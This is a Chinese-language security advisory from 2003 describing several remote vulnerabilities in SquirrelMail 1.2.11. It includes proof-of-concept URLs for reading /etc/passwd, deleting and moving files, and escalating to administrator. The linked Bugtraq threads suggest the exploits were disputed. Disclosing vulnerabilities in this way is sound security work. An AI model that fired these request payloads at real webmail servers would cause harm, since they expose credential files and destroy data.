|
|
Squirrelmail 存在多个远程漏洞
发布时间:2003-06-17
更新时间:2003-06-17
严重程度:中
威胁程度:其它
错误类型:设计错误
利用方式:服务器模式
BUGTRAQ ID:7952
受影响系统SquirrelMail SquirrelMail 1.2.11 详细描述
SquirrelMail由PHP编写的WEBMAIL程序。
SquirrelMail存在多个漏洞,可导致权限提升,文件下载,数据破坏等攻击,问题是由于对用户提交的请求缺少正确过滤。
测试代码
文件泄露:
http://www.example.com/src/read_body.php?mailbox=/etc/passwd&passed_id=1&
文件删除:
http://www.example.com/src/delete_message.php?mailbox=[filehere]&message=1
文件移动:
http://www.example.com/src/move_messages.php?msg=1&mailbox=[file_you_want_to_move]&startMessage=1&targetMailbox=[target_mailbox_here]
文件下载:
http://www.example.com/src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd
权限提升:
http://www.example.com/plugins/administrator/options.php?username="root"&adm_Group1=//Find it from file:plugins/administrator/admins//&off=true&key=$
解决方案
厂商还未提供解决方案。
相关信息
Invalid SquirrelMail Exploit
http://archives.neohapsis.com/archives/bugtraq/2003-06/0176.html
Re: Invalid SquirrelMail Exploit
http://archives.neohapsis.com/archives/bugtraq/2003-06/0186.html
|
